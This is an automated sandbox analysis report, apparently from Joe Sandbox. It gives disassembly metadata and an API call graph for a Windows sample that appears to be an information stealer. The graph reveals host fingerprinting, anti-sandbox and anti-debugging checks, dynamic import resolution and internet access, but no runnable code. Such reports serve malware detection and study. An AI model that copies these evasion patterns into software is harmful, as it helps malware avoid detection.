                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                      • Opcode ID: c60168d2dc5c7e257d34e811f42b995e56a84f1dde4c6fcfa780d80c25332ff1
                                                                                                                                                                                                                      • Instruction ID: e35a820edf7f95b64546043b6243651a0773e18f20bb1881f50efa73cdffa73f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c60168d2dc5c7e257d34e811f42b995e56a84f1dde4c6fcfa780d80c25332ff1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF01DB1505B909E83319F7A9481483FBE4BE293107988E2EE1DEC3A11D730E544CBA9
                                                                                                                                                                                                                      Function 00621F67 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00621FA7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                      • String ID: #Da$InitializeCriticalSectionEx
                                                                                                                                                                                                                      • API String ID: 2593887523-3396712175
                                                                                                                                                                                                                      • Opcode ID: 2469386c50e863922c95cf4b069cf4006b285408a5f9568ef4988f7145edccef
                                                                                                                                                                                                                      • Instruction ID: 8cf35d5fc76e4a10aeaa5ef1dd0cf7e53dbb580e05cd542ab477be4f355d35da
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2469386c50e863922c95cf4b069cf4006b285408a5f9568ef4988f7145edccef
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21E09232688628BBCF112F51ED0AD9E7F57EB117A0F014020FD285D160CBB28972DAC1
                                                                                                                                                                                                                      Function 00621DED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Alloc
                                                                                                                                                                                                                      • String ID: #Da$FlsAlloc
                                                                                                                                                                                                                      • API String ID: 2773662609-3740387315
                                                                                                                                                                                                                      • Opcode ID: 53b3b00cda05ce4f06947bdc3e2d8d9411768f50effa80a29c16004faee74150
                                                                                                                                                                                                                      • Instruction ID: b2f48a57ae6d31dd919a1b508f894ef2a4721c636226bf627d1038c289db86a3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53b3b00cda05ce4f06947bdc3e2d8d9411768f50effa80a29c16004faee74150
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27E0CD31AC4B387397103351AC179DE7D07CB66B71F030030FD085D540D9E1081289D5

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:4.4%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:3%
                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                      Total number of Limit Nodes:30
                                                                                                                                                                                                                      execution_graph 82422 6c8bb8ae 82424 6c8bb8ba ___scrt_is_nonwritable_in_current_image 82422->82424 82423 6c8bb8c9 82424->82423 82425 6c8bb8e3 dllmain_raw 82424->82425 82426 6c8bb8de 82424->82426 82425->82423 82427 6c8bb8fd dllmain_crt_dispatch 82425->82427 82435 6c89bed0 DisableThreadLibraryCalls LoadLibraryExW 82426->82435 82427->82423 82427->82426 82429 6c8bb91e 82430 6c8bb94a 82429->82430 82436 6c89bed0 DisableThreadLibraryCalls LoadLibraryExW 82429->82436 82430->82423 82431 6c8bb953 dllmain_crt_dispatch 82430->82431 82431->82423 82433 6c8bb966 dllmain_raw 82431->82433 82433->82423 82434 6c8bb936 dllmain_crt_dispatch dllmain_raw 82434->82430 82435->82429 82436->82434 82437 6c883060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 82442 6c8bab2a 82437->82442 82441 6c8830db 82446 6c8bae0c _crt_atexit _register_onexit_function 82442->82446 82444 6c8830cd 82445 6c8bb320 5 API calls ___raise_securityfailure 82444->82445 82445->82441 82446->82444 82447 6c8835a0 82448 6c883846 __aulldiv 82447->82448 82449 6c8835c4 InitializeCriticalSectionAndSpinCount getenv 82447->82449 82464 6c8bb320 5 API calls ___raise_securityfailure 82448->82464 82451 6c8838fc strcmp 82449->82451 82461 6c8835f3 __aulldiv 82449->82461 82453 6c883912 strcmp 82451->82453 82451->82461 82452 6c8838f4 82453->82461 82454 6c8835f8 QueryPerformanceFrequency 82454->82461 82455 6c883622 _strnicmp 82456 6c883944 _strnicmp 82455->82456 82455->82461 82458 6c88395d 82456->82458 82456->82461 82457 6c88376a QueryPerformanceCounter EnterCriticalSection 82460 6c8837b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 82457->82460 82463 6c88375c 82457->82463 82459 6c883664 GetSystemTimeAdjustment 82459->82461 82462 6c8837fc LeaveCriticalSection 82460->82462 82460->82463 82461->82454 82461->82455 82461->82456 82461->82458 82461->82459 82461->82463 82462->82448 82462->82463 82463->82448 82463->82457 82463->82460 82463->82462 82464->82452 82465 6c89c930 GetSystemInfo VirtualAlloc 82466 6c89c9a3 GetSystemInfo 82465->82466 82467 6c89c973 82465->82467 82469 6c89c9d0 82466->82469 82470 6c89c9b6 82466->82470 82481 6c8bb320 5 API calls ___raise_securityfailure 82467->82481 82469->82467 82473 6c89c9d8 VirtualAlloc 82469->82473 82470->82469 82472 6c89c9bd 82470->82472 82471 6c89c99b 82472->82467 82474 6c89c9c1 VirtualFree 82472->82474 82475 6c89c9ec 82473->82475 82476 6c89c9f0 82473->82476 82474->82467 82475->82467 82482 6c8bcbe8 GetCurrentProcess TerminateProcess 82476->82482 82481->82471 82483 6c8bb830 82484 6c8bb83b 82483->82484 82485 6c8bb86e dllmain_crt_process_detach 82483->82485 82486 6c8bb860 dllmain_crt_process_attach 82484->82486 82487 6c8bb840 82484->82487 82485->82487 82486->82487 82488 6c8bb9c0 82489 6c8bb9c9 82488->82489 82490 6c8bb9ce dllmain_dispatch 82488->82490 82492 6c8bbef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 82489->82492 82492->82490 82493 41848d 82494 418494 82493->82494 82497 41d016 82494->82497 82496 4184a9 82498 41d020 IsDebuggerPresent 82497->82498 82499 41d01e 82497->82499 82505 41d975 82498->82505 82499->82496 82502 41d460 SetUnhandledExceptionFilter UnhandledExceptionFilter 82503 41d485 GetCurrentProcess TerminateProcess 82502->82503 82504 41d47d __call_reportfault 82502->82504 82503->82496 82504->82503 82505->82502 82506 6c8bb694 82507 6c8bb6a0 ___scrt_is_nonwritable_in_current_image 82506->82507 82536 6c8baf2a 82507->82536 82509 6c8bb6a7 82510 6c8bb6d1 82509->82510 82511 6c8bb796 82509->82511 82520 6c8bb6ac ___scrt_is_nonwritable_in_current_image 82509->82520 82540 6c8bb064 82510->82540 82553 6c8bb1f7 IsProcessorFeaturePresent 82511->82553 82514 6c8bb6e0 __RTC_Initialize 82514->82520 82543 6c8bbf89 InitializeSListHead 82514->82543 82516 6c8bb7b3 ___scrt_uninitialize_crt __RTC_Initialize 82517 6c8bb6ee ___scrt_initialize_default_local_stdio_options 82519 6c8bb6f3 _initterm_e 82517->82519 82518 6c8bb79d ___scrt_is_nonwritable_in_current_image 82518->82516 82521 6c8bb828 82518->82521 82522 6c8bb7d2 82518->82522 82519->82520 82523 6c8bb708 82519->82523 82524 6c8bb1f7 ___scrt_fastfail 6 API calls 82521->82524 82557 6c8bb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 82522->82557 82544 6c8bb072 82523->82544 82528 6c8bb82f 82524->82528 82526 6c8bb7d7 82558 6c8bbf95 __std_type_info_destroy_list 82526->82558 82531 6c8bb83b 82528->82531 82532 6c8bb86e dllmain_crt_process_detach 82528->82532 82530 6c8bb70d 82530->82520 82533 6c8bb711 _initterm 82530->82533 82534 6c8bb860 dllmain_crt_process_attach 82531->82534 82535 6c8bb840 82531->82535 82532->82535 82533->82520 82534->82535 82537 6c8baf33 82536->82537 82559 6c8bb341 IsProcessorFeaturePresent 82537->82559 82539 6c8baf3f ___scrt_uninitialize_crt 82539->82509 82560 6c8baf8b 82540->82560 82542 6c8bb06b 82542->82514 82543->82517 82545 6c8bb077 ___scrt_release_startup_lock 82544->82545 82546 6c8bb07b 82545->82546 82547 6c8bb082 82545->82547 82570 6c8bb341 IsProcessorFeaturePresent 82546->82570 82549 6c8bb087 _configure_narrow_argv 82547->82549 82551 6c8bb092 82549->82551 82552 6c8bb095 _initialize_narrow_environment 82549->82552 82550 6c8bb080 82550->82530 82551->82530 82552->82550 82554 6c8bb20c ___scrt_fastfail 82553->82554 82555 6c8bb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 82554->82555 82556 6c8bb302 ___scrt_fastfail 82555->82556 82556->82518 82557->82526 82558->82516 82559->82539 82561 6c8baf9a 82560->82561 82562 6c8baf9e 82560->82562 82561->82542 82563 6c8bafab ___scrt_release_startup_lock 82562->82563 82564 6c8bb028 82562->82564 82567 6c8bafb8 _initialize_onexit_table 82563->82567 82568 6c8bafd6 82563->82568 82565 6c8bb1f7 ___scrt_fastfail 6 API calls 82564->82565 82566 6c8bb02f 82565->82566 82567->82568 82569 6c8bafc7 _initialize_onexit_table 82567->82569 82568->82542 82569->82568 82570->82550 82571 4184ae 82572 4184b0 82571->82572 82623 402b68 82572->82623 82581 401284 25 API calls 82582 4184df 82581->82582 82583 401284 25 API calls 82582->82583 82584 4184e9 82583->82584 82738 40148a GetPEB 82584->82738 82586 4184f3 82587 401284 25 API calls 82586->82587 82588 4184fd 82587->82588 82589 401284 25 API calls 82588->82589 82590 418507 82589->82590 82591 401284 25 API calls 82590->82591 82592 418511 82591->82592 82739 4014a2 GetPEB 82592->82739 82594 41851b 82595 401284 25 API calls 82594->82595 82596 418525 82595->82596 82597 401284 25 API calls 82596->82597 82598 41852f 82597->82598 82599 401284 25 API calls 82598->82599 82600 418539 82599->82600 82740 4014f9 82600->82740 82603 401284 25 API calls 82604 41854d 82603->82604 82605 401284 25 API calls 82604->82605 82606 418557 82605->82606 82607 401284 25 API calls 82606->82607 82608 418561 82607->82608 82763 401666 GetTempPathW 82608->82763 82611 401284 25 API calls 82612 418570 82611->82612 82613 401284 25 API calls 82612->82613 82614 41857a 82613->82614 82615 401284 25 API calls 82614->82615 82616 418584 82615->82616 82775 417041 82616->82775 83200 4047e8 GetProcessHeap HeapAlloc 82623->83200 82626 4047e8 3 API calls 82627 402b93 82626->82627 82628 4047e8 3 API calls 82627->82628 82629 402bac 82628->82629 82630 4047e8 3 API calls 82629->82630 82631 402bc3 82630->82631 82632 4047e8 3 API calls 82631->82632 82633 402bda 82632->82633 82634 4047e8 3 API calls 82633->82634 82635 402bf0 82634->82635 82636 4047e8 3 API calls 82635->82636 82637 402c07 82636->82637 82638 4047e8 3 API calls 82637->82638 82639 402c1e 82638->82639 82640 4047e8 3 API calls 82639->82640 82641 402c38 82640->82641 82642 4047e8 3 API calls 82641->82642 82643 402c4f 82642->82643 82644 4047e8 3 API calls 82643->82644 82645 402c66 82644->82645 82646 4047e8 3 API calls 82645->82646 82647 402c7d 82646->82647 82648 4047e8 3 API calls 82647->82648 82649 402c93 82648->82649 82650 4047e8 3 API calls 82649->82650 82651 402caa 82650->82651 82652 4047e8 3 API calls 82651->82652 82653 402cc1 82652->82653 82654 4047e8 3 API calls 82653->82654 82655 402cd8 82654->82655 82656 4047e8 3 API calls 82655->82656 82657 402cf2 82656->82657 82658 4047e8 3 API calls 82657->82658 82659 402d09 82658->82659 82660 4047e8 3 API calls 82659->82660 82661 402d20 82660->82661 82662 4047e8 3 API calls 82661->82662 82663 402d37 82662->82663 82664 4047e8 3 API calls 82663->82664 82665 402d4e 82664->82665 82666 4047e8 3 API calls 82665->82666 82667 402d65 82666->82667 82668 4047e8 3 API calls 82667->82668 82669 402d7c 82668->82669 82670 4047e8 3 API calls 82669->82670 82671 402d92 82670->82671 82672 4047e8 3 API calls 82671->82672 82673 402dac 82672->82673 82674 4047e8 3 API calls 82673->82674 82675 402dc3 82674->82675 82676 4047e8 3 API calls 82675->82676 82677 402dda 82676->82677 82678 4047e8 3 API calls 82677->82678 82679 402df1 82678->82679 82680 4047e8 3 API calls 82679->82680 82681 402e07 82680->82681 82682 4047e8 3 API calls 82681->82682 82683 402e1e 82682->82683 82684 4047e8 3 API calls 82683->82684 82685 402e35 82684->82685 82686 4047e8 3 API calls 82685->82686 82687 402e4c 82686->82687 82688 4047e8 3 API calls 82687->82688 82689 402e66 82688->82689 82690 4047e8 3 API calls 82689->82690 82691 402e7d 82690->82691 82692 4047e8 3 API calls 82691->82692 82693 402e94 82692->82693 82694 4047e8 3 API calls 82693->82694 82695 402eaa 82694->82695 82696 4047e8 3 API calls 82695->82696 82697 402ec1 82696->82697 82698 4047e8 3 API calls 82697->82698 82699 402ed8 82698->82699 82700 4047e8 3 API calls 82699->82700 82701 402eec 82700->82701 82702 4047e8 3 API calls 82701->82702 82703 402f03 82702->82703 82704 418643 82703->82704 83204 41859a GetPEB 82704->83204 82706 418649 82707 418844 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 82706->82707 82708 418659 82706->82708 82709 4188a3 GetProcAddress 82707->82709 82710 4188b5 82707->82710 82715 418673 20 API calls 82708->82715 82709->82710 82711 4188e7 82710->82711 82712 4188be GetProcAddress GetProcAddress 82710->82712 82713 4188f0 GetProcAddress 82711->82713 82714 418902 82711->82714 82712->82711 82713->82714 82716 41890b GetProcAddress 82714->82716 82717 41891d 82714->82717 82715->82707 82716->82717 82718 418926 GetProcAddress GetProcAddress 82717->82718 82719 4184c1 82717->82719 82718->82719 82720 4010f0 GetCurrentProcess VirtualAllocExNuma 82719->82720 82721 401111 ExitProcess 82720->82721 82722 401098 VirtualAlloc 82720->82722 82725 4010b8 _memset 82722->82725 82724 4010ec 82727 401284 82724->82727 82725->82724 82726 4010d5 VirtualFree 82725->82726 82726->82724 82728 4012ac _memset 82727->82728 82729 4012bb 13 API calls 82728->82729 83205 410c85 GetProcessHeap HeapAlloc GetComputerNameA 82729->83205 82731 4013e9 82733 41d016 _CountryEnumProc@4 5 API calls 82731->82733 82735 4013f4 82733->82735 82735->82581 82736 4013b9 82736->82731 82737 4013e2 ExitProcess 82736->82737 82738->82586 82739->82594 83208 4014ad GetPEB 82740->83208 82743 4014ad 2 API calls 82744 401516 82743->82744 82745 4014ad 2 API calls 82744->82745 82762 4015a1 82744->82762 82746 401529 82745->82746 82747 4014ad 2 API calls 82746->82747 82746->82762 82748 401538 82747->82748 82749 4014ad 2 API calls 82748->82749 82748->82762 82750 401547 82749->82750 82751 4014ad 2 API calls 82750->82751 82750->82762 82752 401556 82751->82752 82753 4014ad 2 API calls 82752->82753 82752->82762 82754 401565 82753->82754 82755 4014ad 2 API calls 82754->82755 82754->82762 82756 401574 82755->82756 82757 4014ad 2 API calls 82756->82757 82756->82762 82758 401583 82757->82758 82759 4014ad 2 API calls 82758->82759 82758->82762 82760 401592 82759->82760 82761 4014ad 2 API calls 82760->82761 82760->82762 82761->82762 82762->82603 82764 4016a4 wsprintfW 82763->82764 82766 4017f7 82763->82766 82765 4016d0 CreateFileW 82764->82765 82765->82766 82768 4016fb GetProcessHeap RtlAllocateHeap _time64 srand rand 82765->82768 82767 41d016 _CountryEnumProc@4 5 API calls 82766->82767 82769 401807 82767->82769 82773 401754 _memset 82768->82773 82769->82611 82770 401733 WriteFile 82770->82766 82770->82773 82771 401768 CloseHandle CreateFileW 82771->82766 82772 40179e ReadFile 82771->82772 82772->82766 82772->82773 82773->82766 82773->82770 82773->82771 82774 4017c3 GetProcessHeap RtlFreeHeap CloseHandle 82773->82774 82774->82765 82774->82766 82776 417051 82775->82776 83212 4104e7 82776->83212 82780 417080 83217 410609 lstrlenA 82780->83217 82783 410609 3 API calls 82784 4170a5 82783->82784 82785 410609 3 API calls 82784->82785 82786 4170ae 82785->82786 83221 41058d 82786->83221 82788 4170ba 82789 4170e3 OpenEventA 82788->82789 82790 4170f6 CreateEventA 82789->82790 82791 4170dc CloseHandle 82789->82791 82792 4104e7 lstrcpyA 82790->82792 82791->82789 82793 41711e 82792->82793 83225 410549 lstrlenA 82793->83225 82796 410549 2 API calls 82797 417185 82796->82797 83229 402f12 82797->83229 82800 418950 121 API calls 82801 4172ca 82800->82801 82802 4104e7 lstrcpyA 82801->82802 83011 41757f 82801->83011 82805 4172e5 82802->82805 82807 410609 3 API calls 82805->82807 82806 41058d lstrcpyA 82808 4175af 82806->82808 82809 4172f7 82807->82809 82812 4104e7 lstrcpyA 82808->82812 82810 41058d lstrcpyA 82809->82810 82811 417300 82810->82811 82814 410609 3 API calls 82811->82814 82813 4175c6 82812->82813 82815 410609 3 API calls 82813->82815 82816 41731b 82814->82816 82817 4175d9 82815->82817 82818 41058d lstrcpyA 82816->82818 83801 4105c7 82817->83801 82820 417324 82818->82820 82823 410609 3 API calls 82820->82823 82822 41058d lstrcpyA 82826 4175f2 82822->82826 82824 41733f 82823->82824 82825 41058d lstrcpyA 82824->82825 82828 417348 82825->82828 82827 417604 CreateDirectoryA 82826->82827 83805 401cfd 82827->83805 82832 410609 3 API calls 82828->82832 82834 417363 82832->82834 82833 41762e 83889 41824d 82833->83889 82836 41058d lstrcpyA 82834->82836 82837 41736c 82836->82837 82839 410609 3 API calls 82837->82839 82838 41763f 82840 41058d lstrcpyA 82838->82840 82841 417387 82839->82841 82842 417656 82840->82842 82843 41058d lstrcpyA 82841->82843 82844 41058d lstrcpyA 82842->82844 82845 417390 82843->82845 82846 417666 82844->82846 82849 410609 3 API calls 82845->82849 83896 410519 82846->83896 82852 4173ab 82849->82852 82850 410609 3 API calls 82851 417685 82850->82851 82853 41058d lstrcpyA 82851->82853 82854 41058d lstrcpyA 82852->82854 82855 41768e 82853->82855 82856 4173b4 82854->82856 82857 4105c7 2 API calls 82855->82857 82858 410609 3 API calls 82856->82858 82860 4176ab 82857->82860 82859 4173cf 82858->82859 82861 41058d lstrcpyA 82859->82861 82862 41058d lstrcpyA 82860->82862 82863 4173d8 82861->82863 82864 4176b4 82862->82864 82866 410609 3 API calls 82863->82866 82865 4176bd InternetOpenA InternetOpenA 82864->82865 82867 410519 lstrcpyA 82865->82867 82868 4173f3 82866->82868 82869 417707 82867->82869 82870 41058d lstrcpyA 82868->82870 82871 4104e7 lstrcpyA 82869->82871 82872 4173fc 82870->82872 82873 417716 82871->82873 82877 410609 3 API calls 82872->82877 83900 4109a2 GetWindowsDirectoryA 82873->83900 82876 410519 lstrcpyA 82878 417731 82876->82878 82879 417417 82877->82879 83918 404b2e 82878->83918 82881 41058d lstrcpyA 82879->82881 82883 417420 82881->82883 82886 410609 3 API calls 82883->82886 82885 417744 82888 4104e7 lstrcpyA 82885->82888 82887 41743b 82886->82887 82889 41058d lstrcpyA 82887->82889 82890 417779 82888->82890 82891 417444 82889->82891 82892 401cfd lstrcpyA 82890->82892 82895 410609 3 API calls 82891->82895 82893 41778a 82892->82893 84068 405f39 82893->84068 82897 41745f 82895->82897 82900 41058d lstrcpyA 82897->82900 82899 4177a2 82901 4104e7 lstrcpyA 82899->82901 82902 417468 82900->82902 82903 4177b6 82901->82903 82906 410609 3 API calls 82902->82906 82904 401cfd lstrcpyA 82903->82904 82905 4177c0 82904->82905 82907 405f39 43 API calls 82905->82907 82908 417483 82906->82908 82909 4177cc 82907->82909 82910 41058d lstrcpyA 82908->82910 84241 413259 strtok_s 82909->84241 82911 41748c 82910->82911 82915 410609 3 API calls 82911->82915 82913 4177df 82914 4104e7 lstrcpyA 82913->82914 82916 4177f2 82914->82916 82917 4174a7 82915->82917 82918 401cfd lstrcpyA 82916->82918 82919 41058d lstrcpyA 82917->82919 82920 417803 82918->82920 82921 4174b0 82919->82921 82922 405f39 43 API calls 82920->82922 82926 410609 3 API calls 82921->82926 82923 41780f 82922->82923 84250 413390 strtok_s 82923->84250 82925 417822 82927 401cfd lstrcpyA 82925->82927 82928 4174cb 82926->82928 82929 417833 82927->82929 82930 41058d lstrcpyA 82928->82930 84257 413b86 82929->84257 82932 4174d4 82930->82932 82936 410609 3 API calls 82932->82936 82937 4174ef 82936->82937 82939 41058d lstrcpyA 82937->82939 82941 4174f8 82939->82941 82945 410609 3 API calls 82941->82945 82947 417513 82945->82947 82949 41058d lstrcpyA 82947->82949 82951 41751c 82949->82951 82959 410609 3 API calls 82951->82959 82964 417537 82959->82964 82968 41058d lstrcpyA 82964->82968 82972 417540 82968->82972 82980 410609 3 API calls 82972->82980 82984 41755b 82980->82984 82988 41058d lstrcpyA 82984->82988 82992 417564 82988->82992 83784 41257f 82992->83784 83009 41cc6c 10 API calls 83009->83011 83793 411c4a 83011->83793 83201 402b7c 83200->83201 83202 40480f 83200->83202 83201->82626 83203 404818 lstrlenA 83202->83203 83203->83201 83203->83203 83204->82706 83206 401385 83205->83206 83206->82731 83207 410c53 GetProcessHeap RtlAllocateHeap GetUserNameA 83206->83207 83207->82736 83211 4014e9 83208->83211 83209 4014d9 lstrcmpiW 83210 4014ef 83209->83210 83209->83211 83210->82743 83210->82762 83211->83209 83211->83210 83213 4104f2 83212->83213 83214 410513 83213->83214 83215 410509 lstrcpyA 83213->83215 83216 410c53 GetProcessHeap RtlAllocateHeap GetUserNameA 83214->83216 83215->83214 83216->82780 83218 410630 83217->83218 83219 410656 83218->83219 83220 410643 lstrcpyA lstrcatA 83218->83220 83219->82783 83220->83219 83223 41059c 83221->83223 83222 4105c3 83222->82788 83223->83222 83224 4105bb lstrcpyA 83223->83224 83224->83222 83226 41055e 83225->83226 83227 410587 83226->83227 83228 41057d lstrcpyA 83226->83228 83227->82796 83228->83227 83230 4047e8 3 API calls 83229->83230 83231 402f27 83230->83231 83232 4047e8 3 API calls 83231->83232 83233 402f3e 83232->83233 83234 4047e8 3 API calls 83233->83234 83235 402f55 83234->83235 83236 4047e8 3 API calls 83235->83236 83237 402f6c 83236->83237 83238 4047e8 3 API calls 83237->83238 83239 402f85 83238->83239 83240 4047e8 3 API calls 83239->83240 83241 402f9c 83240->83241 83242 4047e8 3 API calls 83241->83242 83243 402fb3 83242->83243 83244 4047e8 3 API calls 83243->83244 83245 402fca 83244->83245 83246 4047e8 3 API calls 83245->83246 83247 402fe4 83246->83247 83248 4047e8 3 API calls 83247->83248 83249 402ffb 83248->83249 83250 4047e8 3 API calls 83249->83250 83251 403011 83250->83251 83252 4047e8 3 API calls 83251->83252 83253 403028 83252->83253 83254 4047e8 3 API calls 83253->83254 83255 40303f 83254->83255 83256 4047e8 3 API calls 83255->83256 83257 403056 83256->83257 83258 4047e8 3 API calls 83257->83258 83259 40306d 83258->83259 83260 4047e8 3 API calls 83259->83260 83261 403084 83260->83261 83262 4047e8 3 API calls 83261->83262 83263 40309b 83262->83263 83264 4047e8 3 API calls 83263->83264 83265 4030b2 83264->83265 83266 4047e8 3 API calls 83265->83266 83267 4030c9 83266->83267 83268 4047e8 3 API calls 83267->83268 83269 4030df 83268->83269 83270 4047e8 3 API calls 83269->83270 83271 4030f6 83270->83271 83272 4047e8 3 API calls 83271->83272 83273 40310f 83272->83273 83274 4047e8 3 API calls 83273->83274 83275 403123 83274->83275 83276 4047e8 3 API calls 83275->83276 83277 40313a 83276->83277 83278 4047e8 3 API calls 83277->83278 83279 403154 83278->83279 83280 4047e8 3 API calls 83279->83280 83281 40316b 83280->83281 83282 4047e8 3 API calls 83281->83282 83283 403182 83282->83283 83284 4047e8 3 API calls 83283->83284 83285 403199 83284->83285 83286 4047e8 3 API calls 83285->83286 83287 4031af 83286->83287 83288 4047e8 3 API calls 83287->83288 83289 4031c5 83288->83289 83290 4047e8 3 API calls 83289->83290 83291 4031dc 83290->83291 83292 4047e8 3 API calls 83291->83292 83293 4031f2 83292->83293 83294 4047e8 3 API calls 83293->83294 83295 40320c 83294->83295 83296 4047e8 3 API calls 83295->83296 83297 403223 83296->83297 83298 4047e8 3 API calls 83297->83298 83299 40323a 83298->83299 83300 4047e8 3 API calls 83299->83300 83301 403250 83300->83301 83302 4047e8 3 API calls 83301->83302 83303 403267 83302->83303 83304 4047e8 3 API calls 83303->83304 83305 40327e 83304->83305 83306 4047e8 3 API calls 83305->83306 83307 403295 83306->83307 83308 4047e8 3 API calls 83307->83308 83309 4032ab 83308->83309 83310 4047e8 3 API calls 83309->83310 83311 4032c2 83310->83311 83312 4047e8 3 API calls 83311->83312 83313 4032d9 83312->83313 83314 4047e8 3 API calls 83313->83314 83315 4032f0 83314->83315 83316 4047e8 3 API calls 83315->83316 83317 403306 83316->83317 83318 4047e8 3 API calls 83317->83318 83319 40331c 83318->83319 83320 4047e8 3 API calls 83319->83320 83321 403333 83320->83321 83322 4047e8 3 API calls 83321->83322 83323 403349 83322->83323 83324 4047e8 3 API calls 83323->83324 83325 40335d 83324->83325 83326 4047e8 3 API calls 83325->83326 83327 403374 83326->83327 83328 4047e8 3 API calls 83327->83328 83329 40338a 83328->83329 83330 4047e8 3 API calls 83329->83330 83331 4033a1 83330->83331 83332 4047e8 3 API calls 83331->83332 83333 4033b8 83332->83333 83334 4047e8 3 API calls 83333->83334 83335 4033cf 83334->83335 83336 4047e8 3 API calls 83335->83336 83337 4033e6 83336->83337 83338 4047e8 3 API calls 83337->83338 83339 4033fd 83338->83339 83340 4047e8 3 API calls 83339->83340 83341 403414 83340->83341 83342 4047e8 3 API calls 83341->83342 83343 40342e 83342->83343 83344 4047e8 3 API calls 83343->83344 83345 403445 83344->83345 83346 4047e8 3 API calls 83345->83346 83347 40345c 83346->83347 83348 4047e8 3 API calls 83347->83348 83349 403473 83348->83349 83350 4047e8 3 API calls 83349->83350 83351 40348a 83350->83351 83352 4047e8 3 API calls 83351->83352 83353 4034a1 83352->83353 83354 4047e8 3 API calls 83353->83354 83355 4034b8 83354->83355 83356 4047e8 3 API calls 83355->83356 83357 4034cf 83356->83357 83358 4047e8 3 API calls 83357->83358 83359 4034e9 83358->83359 83360 4047e8 3 API calls 83359->83360 83361 403500 83360->83361 83362 4047e8 3 API calls 83361->83362 83363 403517 83362->83363 83364 4047e8 3 API calls 83363->83364 83365 40352e 83364->83365 83366 4047e8 3 API calls 83365->83366 83367 403545 83366->83367 83368 4047e8 3 API calls 83367->83368 83369 40355c 83368->83369 83370 4047e8 3 API calls 83369->83370 83371 403573 83370->83371 83372 4047e8 3 API calls 83371->83372 83373 40358a 83372->83373 83374 4047e8 3 API calls 83373->83374 83375 4035a4 83374->83375 83376 4047e8 3 API calls 83375->83376 83377 4035bb 83376->83377 83378 4047e8 3 API calls 83377->83378 83379 4035d2 83378->83379 83380 4047e8 3 API calls 83379->83380 83381 4035e9 83380->83381 83382 4047e8 3 API calls 83381->83382 83383 403600 83382->83383 83384 4047e8 3 API calls 83383->83384 83385 403617 83384->83385 83386 4047e8 3 